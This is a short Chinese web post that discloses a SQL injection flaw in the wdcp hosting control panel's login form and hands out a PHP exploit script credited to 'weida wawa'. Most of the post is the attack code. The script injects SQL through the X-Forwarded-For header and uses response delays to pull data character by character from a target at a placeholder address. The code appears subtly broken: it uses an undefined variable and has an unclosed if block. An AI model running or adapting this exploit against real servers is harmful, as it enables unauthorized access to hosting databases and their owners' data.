wdcp虚拟主机管理系统注入漏洞

日期：-05-13｜来源：伟大娃娃｜作者：人生注入点｜287 人围观

wdcp服务器/虚拟主机管理系统登陆框注入漏洞。

passwd字段存在注入风险，选择限制字符长度为30.我想应该有大牛能绕过！

下面给出由伟大娃娃发布的漏洞利用脚本

<?php

$id=$_GET["id"];

//$id2=$_GET["id2"];

$post_data = 'username=admin&passwd=bbbbbb\&Submit_login=aaaassss';

$url='http://xxx:8080/';

$starttime = time();

$ch = curl_init();

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_URL,$url);

//curl_setopt($ch, CURLOPT_TIMEOUT, 3);

curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR: ,('.$id.'),char(65),1) #'));

curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);

ob_start();

curl_exec($ch);

$result = ob_get_contents() ;

ob_end_clean();

$endtime = time();

if($endtime-$starttime>=3){

exit($id." is ".chr($id2));

echo $result;

?>